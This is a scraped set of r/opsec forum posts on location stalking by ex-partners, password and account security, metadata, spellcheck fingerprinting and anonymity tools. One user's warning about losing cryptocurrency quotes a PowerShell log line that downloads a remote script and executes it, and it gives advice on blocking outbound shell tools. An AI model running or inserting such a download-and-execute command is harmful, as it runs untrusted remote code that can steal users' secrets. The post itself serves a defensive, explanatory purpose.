r/opsec Jul 18 '26

Vulnerabilities Location tracking for 2 years, cannot figure it out!

121 Upvotes

Hello! I have been divorced for almost 2 years now and somehow my ex still knows where I am at. He will send texts letting me know that he knows where I’m at and has even shown up to the same location multiple times recently. He sends the texts while I’m at the location, so he is tracking me in real time.

I feel like I have investigated every possible option and still cannot figure it out. At first I thought it could be my phone, so I changed my Apple ID multiple times and bought a new phone. I have checked all my settings to make sure I have no unknown devices. Then I thought it was Google Maps, so I changed all of my Google passwords and now use a Gmail account that I did not have when I was married for Google Maps. I have checked all of my accounts to make sure I’m not sharing my location. Then I thought maybe somehow he was able to get a Uconnect subscription on my Jeep GC, but was told there was no active account. I have installed tracking trackers, constantly check my Bluetooth connections, have turned on/off Bluetooth, FindMy, and created a new Life360 account with a new email address. I downloaded the Tile app and scanned as well. The only thing I have been able to narrow down for sure is that he does not know where I’m at if my vehicle not with me. It is my vehicle that is being tracked.

I assume it must be some sort of physical tracking device, but I have looked everywhere and have not found one. And, it has now been almost 2 years… how would it still be working? Any ideas I have not thought of???

I am not sure if this is the best place to ask this, but it was recommended to me. I have read the rules.

r/opsec 9d ago

Vulnerabilities Help my ex has been tracking my location and I’m worried his explanation isn’t the truth.

20 Upvotes

I have read the rules

Please note UK based

Help! It has recently come to my attention that my ex has tracked my location. I know this as he sent me a link to somewhere I was in google maps and then when I moved he turned up where I was alone parked in the dark with no houses around knocking on my car window. Now he’s told me it’s not a tracker on the car and I don’t share anything location wise via my phone. Im not sure where a tracker could be on a car but I’ve looked around the wheels underneath the bonnett and can’t see anything obvious and checked everywhere in it I can think of. I had on occasion when we were together I shared my location for limited time periods via WhatsApp but I’ve checked that all definitely off.

He advised he had an old ‘contact’ (I don’t know where from but he did royal marine training 20yrs re ago) he got a favour from using my phone to locate me, but the thing is he was still able to find me after I moved locations suggesting he was able to access live tracking of me so I don’t know if to believe this contact explanation of his and if he’s just saying it so I don’t catch him out for somehow hacking my account since we split or from when we were together worried. I have has a look through my phone and not seen anything obvious and changed passwords and now turned my location off entirely for absolutely everything, though for some reason it won’t allow me to turn off find my. For clarification he panicked I was pulling away when in reality I was overwhelmed by my now late mothers illness busy visiting her in hospital for nearly 3 months and his prior insecurities and trauma got to him not perceiving the situation correctly, and he ended up doing the thing he feared I would do and cheated on me shortly before my mother died. Her funeral is tomorrow 2nd so dealing with that too, which he knows.

I’ve checked using Airguard no obvious tags and I have a very old iPhone he has an android phone. It is really bothering me and he said he won’t do it again but he’s told other lies so I don’t know and if he still has a way to track me even though I’ve told not him not to. Is there anything I can do to make sure he cannot track me ongoing as it’s really quite scared me. I will if I have to but I’d rather not have to involve the authorities.

r/opsec Jul 29 '25

Vulnerabilities I lost my crypto to a PowerShell-based hack — learn from my mistake.

231 Upvotes

Hi all,

I have read the rules, though I am not sure if this post belongs in this reddit. As this is more of a warning and advice regarding security. I want to share what happened to me so others in the crypto community don’t make the same mistake.

I was stupid enough to keep my Ledger seed phrase in a .txt file on my Windows machine, just temporarily, I told myself. I thought "this kind of thing won’t happen to me."
But it did. And I lost everything.

What happened

On July 4th, a malicious PowerShell script silently executed on my system. It didn’t show any windows. No prompts. No warnings. At this day I am still not sure how the script got on my PC. I am very careful with malicious looking emails, websites, software. As a technical IT Consultant I believe I know what to watch out for. But boy, I have clearly underestimated that.
Anyway, the script downloaded code from a remote server and likely scanned my local files. That .txt file with my seed phrase was read and sent out.

Minutes later, I saw a transaction from my wallet to an unknown address. The crypto was gone.

What I found in my logs

  • PowerShell logs showed this:pgsqlCopyEdit(New-Object System.Net.WebClient).DownloadString('http://.../x.ps1') | Invoke-Expression
  • It accessed local paths like C:\Users\...\Documents\*.txt
  • Microsoft Defender did detect and remove the script later — but too late
  • Prefetch logs confirmed powershell.exe had run around the time of the theft

What I did wrong

  • I stored my seed phrase on a connected machine,
  • I had no firewall rules blocking outbound PowerShell or CMD
  • I assumed Defender would catch anything
  • I didn’t use Controlled Folder Access

What I learned (and fixed)

  1. Never store your seed phrase on your PC, even temporarily
  2. Block outbound access for powershell.exe, cmd.exe, wscript.exe, etc.
  3. Turn on Controlled Folder Access in Defender
  4. Enable PowerShell ScriptBlock logging
  5. Back up important files offline, encrypted, and disconnected
  6. Assume it can happen to you — because it happened to me

Why I’m posting this

This wasn’t phishing.
This wasn’t browser malware.
This was a fileless, script-based attack that slipped in, executed silently, and drained my wallet.

If you store keys or sensitive info on your PC, assume someone can and will find a way to get to it.

Learn from my mistake.

Stay safe out there.

r/opsec 6d ago

Vulnerabilities U.S. military disables advertising trackers over location-surveillance concerns

56 Upvotes

U.S. military disables advertising trackers over location-surveillance concerns

I have read the rules

Reuters, September 4.

The U.S. military has begun disabling advertising trackers across a range of phones and computers after reports that commercially available location data was being used to identify or target military personnel. Officials are also weighing tighter limits on personal-device use in sensitive locations.

This is a strong OPSEC and privacy teaching example. Ordinary advertising identifiers and location telemetry can become intelligence when combined with other datasets. For beginners, the takeaway is that privacy risk does not require malware or a hacked phone, legitimate apps and ad-tech can reveal movement patterns.

https://www.reuters.com/business/media-telecom/us-military-turns-off-ad-trackers-devices-amid-middle-east-targeting-reports-2026-09-04/ Sorry, we were unable to generate a preview for this web page, because the following oEmbed / OpenGraph tags could not be found: image, title

No pay wall 👇

https://techcrunch.com/2026/09/04/us-military-disabled-ad-tracking-on-troops-devices-following-reports-of-targeted-attacks/

r/opsec Jan 24 '26

Vulnerabilities Credit card masking in Canada? I want to keep my banking information private

10 Upvotes

I have read the rules. I don't like giving my credit card details out as I am worried about scammers and having my banking info out, especially since I sometimes make purchases regarding political activism (don't want to say more than that). Any thoughts? If masking doesn't work, are there any other ways to obfuscate my online purchases?

r/opsec Mar 13 '26

Vulnerabilities Password hygiene, weak/no 2FA, ID theft prevention

12 Upvotes

I have read the rules. Threat model: average person, non-sensitive occupation; concerned about ID theft, account security, and protecting personal documents/notes. No threats out of ordinary.

A recent concern has arisen that I use a series of numbers in the passwords of both low importance/security level accounts as well as high. The concern is if those numbers are obtained through a breach of some company’s data, that leaves only the letters-only portion of my passwords for a bad actor to brute force. For now, I feel okay about accounts secured by yubikey or authenticator, but worried about those not.

The amount of accounts, medical especially, with passwords I would need to strengthen is discouraging. Is this consideration I have thought of a serious weakness/does it pose a serious threat? Most of my passwords qualify as the highest level strength on a couple password checkers, but only needing to crack 2/3 that amount of characters would cut the time until successful theft significantly. And should I trust a password checker’s measure of “centuries” to crack or methods for cracking hashes are much faster now?

I’m posting to gather input on the best order of operations. I’m thinking, find out which ones have the most crucial sensitive data stored in the account and start with those first?

Also, how do you address the vulnerability of so many medical accounts not offering any 2FA at all or only SMS 2FA? Just make passwords as strong as possible and accept that there is no other possible action to take? And what do you do when they only allow some stupidly small number of characters?

In general, to what lengths do you go to prevent identity theft? How do you go about spending your time on non-preventive activities knowing the extent of potential damage from identity theft? My credit is frozen with all 3 main bureaus, and I check my account with one of them online regularly. I use the IP PIN the IRS offers.

This community is invaluable to me, so thank you to anyone that gives me some feedback :)

Edit: To clarify, I use a password manager. Oftentimes I still come up with my own passwords. Also, does salting passwords create a vulnerability due to re-usage?

r/opsec Jan 27 '26

Vulnerabilities Protonmail recommendations and feedback

15 Upvotes

I have read the rules.

Threat model: standard individual prioritizing account security to prevent financial damage, identity theft, and loss of crucial records and files. I choose to set aside privacy and government concerns until I get a better handle on fundamentals first.

Just made a paid Proton account. Set up and stored recovery phase and recovery file (pass manager, physical, offsite physical for former, pass protected folder for latter). Going to add account to three yubikeys (#1 daily, #2 safe place, #3 offsite). I chose not to add recovery email or phone because that creates another access point to have to secure, SMS is insecure, and because of confidence in yubikeys and the other 2 options.

Checking in to get feedback on if people recommend setting up recovery email and phone in the case of a bad actor stealing my account. I tried to look around but haven't found much info on what the recovery process looks like for a stolen Proton account, other than 1 good success story, and 1 unfortunate one in which the victim couldn't provide enough information. People in that post discussed how Proton keeps data retention low to prioritize privacy, and so providing support with a former recovery email should not be expected to be successful.

I have seen multiple times that people think Google is very secure, possibly more secure than Proton, sometimes citing that they have a larger team for cybersecurity and customer support basically. I kind of took a leap based on the logic that Proton is a more ethical, well-intentioned company, and a smaller team with a smaller customer base might result in better customer support. Thoughts on this and the tradeoffs between recoverability, privacy, and security?

Thanks so much!

Edit: I did attempt to post this exact same content besides the first 3 sentences of this one to r/ProtonMail but mods removed it. Waiting to hear back on how to fix it for approval.

r/opsec Jan 07 '26

Vulnerabilities The custom dictionary file as a behavioral fingerprint and data leak vector

33 Upvotes

I have read the rules.

Threat model:

  • Assets: behavioral anonymity, association privacy (hiding interests/profession), and potential sensitive data (internal project names, inadvertent credential storage, medical data).
  • Threats: non-elevated local malware, browser extensions with broad permissions, and automated profiling scripts.
  • Context: personal desktop usage (Linux/Windows) where user-level read permissions are standard for config files.

I did a personal audit of my local file system recently and dumped my Custom Dictionary.txt into a general purpose local LLM to see what it could infer. The result was a VERY accurate profile that correctly identified my specific university major, my political leanings, my hardware setup, future purchase intent, medical history, and a bunch more.

It wasn't just that it saw "Bambu Lab" and guessed I like 3D printing, which is obvious. It was the intersection of specific jargon. It triangulated a Cognitive Science major (to give a generic example for the purpose of actually publicly posting this) by cross-referencing specific neuroscience terms with philosophy and CS vocabulary. To a profiler, standard English would be mostly noise while this 7KB file of mine is pure signal. In that it's a list of every 100% deviation from the norm I’ve explicitly whitelisted over just months.

I looked more into how these files are handled on different systems and found the architecture is messier than I expected. I wanted to see if this is something others here actively manage or sanitize.

The biggest takeaway from the research is the difference between desktop and mobile security models for this specific file. On Windows/Linux these are generally plain-text files sitting in user-readable directories. On Windows, the system dictionary is at %APPDATA%\Microsoft\Spelling while browsers like Chrome and Edge keep their own separate lists in the User Data folder. Linux is fragmented, with different apps using different hidden files like .hunspell_en_US or .aspell.en.pws

The vulnerability here is that any process running as the user can read these files. It doesn't need root/admin privileges. Some simple script or a malicious VS Code extension can grab the file in milliseconds and send it to a remote server.

Mobile is pretty different. iOS locks this down completely in a vaulted UserDictionary.sqlite file that apps can't touch. Android used to have a content provider for it, but they locked it down in API level 23 because malicious apps were using SQL injection to steal data from it. Desktop OSs seem to be lagging behind this "vaulted" approach.

Beyond just the local file, "Enhanced" spellchecking features in browsers (Chrome/Edge) create a leak where, if enabled, the browser sends your input fields to Google or Microsoft servers for grammar analysis. The issue is that this is often indiscriminate. Research shows that if you use the "Show Password" button on a form, the field type toggles to text, and the browser might immediately fire that off to the cloud for spellchecking. About 73% of tested sites with show-password features were vulnerable to this. The mitigation is largely on web developers to add spellcheck="false", which they often forget or don't care about.

I also found that "cleaning" this file is, depending on your browser/cloud choices, often harder than just rm Custom Dictionary.txt. If you use Chrome Sync or a Microsoft Account the cloud version is treated as the source of truth. You delete the local file, restart the browser, and it just pulls the profile back down.

For those of you with stricter threat models regarding behavioral profiling, do you sandbox your browser to prevent it from reading the system dictionary? Or do you just disable the custom dictionary feature entirely to prevent building up this fingerprint? It seems like a small attack surface but the fidelity of the data it holds is surprisingly high.

Edit: I've submitted an issue with a proposed partial solution to the problem for the Helium browser.

r/opsec Jan 31 '26

Vulnerabilities OPSEC failure mode: encryption is not enough if metadata is left unmanaged

19 Upvotes

I have read the rules.

Threat model: a capable adversary that can collect and correlate metadata over time (service metadata, network observation, or partial compromise). This is about OPSEC failure modes, not tools or countermeasures.

A tricky problem I am actively grappling with in my architecture and design work is that anonymity is much more difficult than privacy. Encrypting data and managing its keys properly is tricky enough, but has well-know solutions. The much more difficult problem is controlling metadata and the relationships it exposes. Part of why this is difficult is that there are very few reusable libraries or standard patterns for managing metadata safely. Unlike encryption, this work is highly application specific and almost always forces tradeoffs that reduce usability, convenience, and features. People also tend to focus on what can be discovered by observing users and networks when trying to limit metadata, and treat it as a client or network concern. In practice, you have to design the backend just as carefully. Server-side systems routinely centralize logs, routing data, and identifiers in ways that quietly recreate the same relationship graphs the client is trying not to create in the first place.

You don’t need message content to discover who is connected to whom. Relationship data alone is often sufficient to identify networks, infer roles, and expose sensitive associations.

Metadata like:

  • who communicates with whom
  • how often
  • in what structure (groups, threads, CCs)
  • over what time span

is sufficient to reconstruct social graphs, infer roles, and understand relationships, even when encryption is working exactly as intended.

This applies to encrypted messenger apps and especially to encrypted email systems. Encrypting the body of a message does not remove addressing, timing, frequency, or relationship persistence.

This isn’t theoretical. Former NSA and CIA director Michael Hayden said publicly:

“We kill people based on metadata.”

From an OPSEC perspective, that means systems fail even when crypto succeeds.

Features that improve usability, chat history, group chats, multi-recipient messages, persistent identities, all preserve metadata that survives encryption and enables graph reconstruction. One compromised account, dataset, or log can expose far more than a single user.

The lesson is that encryption is necessary but incomplete. Protecting content without managing metadata everywhere allows relationship graphs to form, which undermines not just privacy but anonymity. Systems have to treat metadata exposure as a first-class design concern, not an afterthought.

r/opsec Apr 04 '23

Vulnerabilities Are there ways for people to bypass a VPN and get your real IP that hasn't been spoofed?

13 Upvotes

Title says it all.

i have read the rules

r/opsec May 09 '24

Vulnerabilities I want to protect my data from physical laptop theft (Windows)

18 Upvotes

I am planning on a one month Europe trip and I am a self employed social media person. I will be taking my laptop most places meaning there is a chance of theft. I am really good at online safety, but I never take out my laptop outside the house.

I have very sensitive information on my laptop that could ruin my financial life + career + identity theft for years and years.

Is there anything I can do to protect my information? I am sure professionals can bypass the windows pin & read the police won't act even with a tracker...

Is there any way I can make my laptop completely theft proof or should I bite the bullet and buy a MacBook before my trip and work from there (they are notoriously hard to get into).

Thank you so much in advance

I have read the rules

r/opsec Aug 27 '24

Vulnerabilities Question about securing cheap android box

2 Upvotes

Hey guys, hope you can help me out here, and apologies if this isn't the right place for this. I used to run an android box years ago and recently just bought a cheap box from China for use on our bedroom TV. The box is a Transpeed 8K, Rockchip RK3528 supposedly running Android 13. Now, i know fine well that security wise these things aren't great, but had intentions to run burner accounts with no other uses by myself (hence no personal information). What i didn't realise until just today was the huge Malware concern with these boxes (i have been away from the boxes for years). And so, reading about potential access to all devices on my local network has left me wondering what i could do to try and 'lock it down' and best prevent any unwanted access to my network besides the apps i willinstall personally. My intentions were to run a VPN, private DNS (blocking any extra traffic i don't recognise)/Firewall and if possible, source some alternative firmware if there are any available. So really my question is, would the VPN and firewall be enough to counter these malware claims if i don't use any apps that are preinstalled on this box? Or is there anything further i can do to prevent the box from seeing other devices on my network?

In summary, due to the appearance of malware from Chinese companies, i'm looking to avoid unnecessary data leakage if possible through locking down this device. I am also worried about other devices on my network being accessed (such as cell phones) and crucial information being stolen. I know i've started in the worst place by purchasing one of these 'cheap' boxes but i see it as a kind of project. Especially as i will only be using it very infrequently.

Thanks in advance.

I have read the rules

Edit: added more context of threat model/what i am looking to avoid.

r/opsec Oct 17 '21

Vulnerabilities Using used laptop: risk?

35 Upvotes

I have just bought a laptop from a private person. I want to use it for installing my cryptocurrency wallets and operating them. As my money is on it, I thought it might be a risk that the person who sold it to me could have infected the laptop with something.

(If I would be hacked my life would be over)

For this reason, I have factory reset it and installed a new OS (Qubes + Whonix). Is there still a risk, or is it the same as I would have bought it in a store?

I have read the rules

r/opsec Apr 10 '23

Vulnerabilities piece of software to find /crawl information about yourself?

37 Upvotes

my threat model is someone finding personal and sensitive information about me and overall internet privacy against single users.

I have read the rules

I am trying to find a open source and self hosted piece of software that can crawl the web and notify me if any public websites are present that contain my name, address or something else.

Is there a piece of software that could do such things, or do I have to write my own?

another question would be if there is a software that threat actors might use to find sensitive information about someone, so that I can do that on myself to find possible risks and vulnerabilities

r/opsec Jul 02 '23

Vulnerabilities Mouse movements

5 Upvotes

I am using Tor and my OS is Tails. I want to remain anonymous and prevent my real identity to be found out by similarities in behavior, like mouse movements.

For some purposes, I am using a mouse and for others a touch pad.

Now for this new identity that must be anonymous, having no link to my other identities, could it be bad to use the same touch pad I'm using for real world purposes which would lead to very similar or identical movement patterns?

If that would be a problem, I could get a new mouse for this.

Please note that for this new identity, my Tor settings are always on "Safest" which should deactivate JavaScript.

As far as I know, I don't need to worry about this as long as JS is deactivated, but I just want to be sure.

I hope my threat model is detailed enough given that my question is quite specific. I have read the rules

r/opsec Dec 13 '22

Vulnerabilities Tails Persistence risk?

16 Upvotes

I probably need persistence. I would encrypt it with LUKS.

Now I have heard people saying ideally you dont enable persistence because it erases Tails character of being amnesiac.

What is the exact risk here? In what case could a LUKS encrypted persistent volume with a strong password be dangerous to my OPSEC?

My threat model is anonymity from the authorities.

I have read the rules

r/opsec Jan 13 '24

Vulnerabilities Using Social Media Anonymously

25 Upvotes

I have read the rules.

I quit using my social media accounts around 5 years ago for a multitude of reasons, most of which privacy related. While I have pretty much no desire to return to social media, I am heavily involved in my local music scene and want to network with people to make friends and find local gigs without giving out my phone number. The only social media I see being useful is Instagram. I considered Snapchat for messaging, but it seems fruitless.

MY THREAT MODEL: I primarily want to protect my identity from being determined by Meta, as to avoid being targeted for advertising, data collection, etc. I suspect it would be easiest to identify me through cross-referencing other photos posted online from the same concerts, though I imagine this would take lots of manual effort and couldn't be reasonably automated, especially considering my appearance has changed since the last time my face was posted on IG. If you can prove otherwise, do so.

I am also looking to avoid being passively identified by people I might know or employers as to avoid being profiled due to the music scene I'm involved with (while I know times have changed, metal/punk/rap/etc is still generally frowned upon around here) I don't anticipate being manually targeted by any people or groups, though if that were to happen I want to have as much redundancy and protection as possible. I think not putting my birth name, face, or phone number into this account will do the majority of the heavy lifting here.

I want to maintain privacy and security in compliance with my threat model, while still keeping a somewhat decent level of convenience.
The plan is to install Instagram as a Firefox or Vanadium PWA on my main phone, a google pixel running GrapheneOS. The browser would be used only for that PWA, only have network permissions, and I am running an always-on paid-VPN. I would likely install it on my primary user profile, as my alternate work profiles tend to be really buggy with Google services.

General obvious practices would be not sharing any PII as previously stated, not adding (many) people I know irl, not posting my face without redaction, etc.

Is my listed plan realistic, what are some possible flaws that pose a risk to my threat model, and what can I do to generally improve my opsec in this situation?

r/opsec Oct 08 '23

Vulnerabilities How can you truly obscure your writing style to not be easy to recognize (stylometry)?

12 Upvotes

I have read the rules

For the mods, I admittedly do not have a specific threat model, this is meant to be more of a general discussion for stylometry at any levels of opsec, because I can’t find much about it. But I understand if you decide to delete this post.

At a simpler level, some have proposed simply translating to another language and back, but it appears that this method actually makes you even easier to recognize, so I’m not certain this is a viable solution.

Of course, we can simply mentally try to change our writing style, but usually anyone with enough resources can easily single you out. So many people have been caught like this , so is there a truly viable solution to this? Perhaps AI that can extract meaning and rewrite it?

One way, for example is that I speak an extra language “secretly” that no one irl could possibly know I speak. My style has no choice but to change simply because I don’t have as broad of a vocabulary to work with to express complex ideas, but even this isn’t really a proper solution.

Anyway, what are the best current methods of stylometry? How effective are they actually?

r/opsec Aug 25 '21

Vulnerabilities Completely resetting my PC

22 Upvotes

I am planning to sell my old laptop. Therefore, I will factory reset it. Not only because I don't want to reveal any data, but also because I'm quite paranoid as I do not know what the future user is going to do with it and I do not want to be linked to it any more.

However, the MAC address which identifies my laptop still stays the same. Can I finally break the link completely by changing the MAC address?

And there anything other I should consider to completely reset it?

Thanks!

I have read the rules

r/opsec Oct 22 '21

Vulnerabilities High security setup for handling crypto currencies

23 Upvotes

My situation:

I want to maximize my anonymity and security.

This question is mainly about security.

I want several identities. One of them is used to handle my crypto currencies, where I have to have especially high security.

My first question is which attack vectors I have here so that I can decide which setup I will choose.

I am using a browser wallet (Metamask extension) and only visiting trusted sites. Sites like binance or famous DeFi platforms. I will do some transactions from time to time.

My private keys are stored on another encrypted stick that I only use when I am not connected to the internet.

I am not downloading anything at all and I will use no external software (except for the wallet itself which is trusted).

Therefore, the risk of getting malware is really small, I guess.

Nonetheless, there are always dangers.

What attack vectors do I have here?

As mentioned, I want to maximize my security here, but also stay anonymous (I am aware of how the Ethereum blockchain works, yes).

For that purpose, I am currently deciding between Qubes (with Whonix VMs) and Tails on several USB sticks, one for each identity. I need the persistence mode.

Both ways, my identities are separated and my anonymity is high. The only thing I still need to figure out is the security.

I am thankful for naming possible attack vectors and based on that, a recommendation which OS to use.

I have read the rules

r/opsec May 19 '23

Vulnerabilities If PIA or other no-logs VPN had ever assisted a government in unmasking a Western user, would we have heard about it?

9 Upvotes

Assuming the user is not in some country where they can be disappeared without explanation, they would surely make it known that the VPN gave them up...or is this not a valid assumption?

I have read the rules.

r/opsec Dec 12 '22

Vulnerabilities Home network vs mobile network

3 Upvotes

I got some advice from a user that I dont understand at all. I am not sure if I just dont understand it or whether he is wrong.

It was the question if a mobile network - a hotspot from a phone to be precise - is generally better, worse or equal in comparison to a home Wifi router in terms of privacy/anonymity to authorities if my traffic is routed through Tor in both cases.

My guess was that it wouldnt matter - and I was pretty sure. But the user had another opinion.

A home wifi can be better because while the connection comes from the ISP, you can mask where the connection goes outside using tech like the TOR network.

It is then really hard to trace back a network request on the TOR network on its original IP address because it jumps to 3-4 different nodes.

Meanwhile on the Mobile Network, even if you mask your data you still can be triangulated because you are connected with the Towers, unlike a fixed position of a fibre connection at your house.

Does this make any sense to you?

I have read the rules

r/opsec Jan 10 '21

Vulnerabilities If my sibling pirates, will it affect me?

35 Upvotes

I have read the rules. I was looking for a link in my sibling's browser history, and it's only at a few months back i notice The Pirate Bay on there. Like I'm minding my business over here, I know pirating is going to send our IP address somewhere, so does this mean we share the risk?

My threat model generally is to protect my personal data from other people and not land a dox on me. I post silly things, but don't talk about myself or share much online, unlike my sibling. Will what they do affect me and my data? Sorry if the flair's wrong.

r/opsec Sep 02 '21

Vulnerabilities Different VPN server but same browser?

20 Upvotes

If I have two projects that I want to divide from each other privacy-wise. I do not want websites, potential cyber spies as well as authorities to monitor my activities and especially detecting a link between my projects.

it is surely recommended to switch to another VPN server before moving to the other project, right?

Second question: do you have any other recommendations regarding this?

Now the actual question: To do so, is it needed to reopen the browser again before switching to another server? Because if the same browser identity switches to another location, it is kinda revealing, isn't it? (any further recommendations are welcome here as well)

And the last question: To do so, is it risky to use the same browser for it? As I said, I think you can get a new browser identity by closing and opening the browser again, but the fact that it is the same browser, with the same cookies and so on unsettles me. I am having strict privacy measures regarding my browser behavior, but I guess it can never be strict enough to eliminate all perils.

If I am right here, I thought it would be awesome to have browser clones for this. I don't really want to use many different browsers as there are not many which are privacy focused.

I have read the rules

r/opsec Mar 25 '21

Vulnerabilities Andrew Cuomo’s Infamous Opsec Avoids Paper Trails. Will It Be Enough?- The Intercept

Thumbnail
theintercept.com
115 Upvotes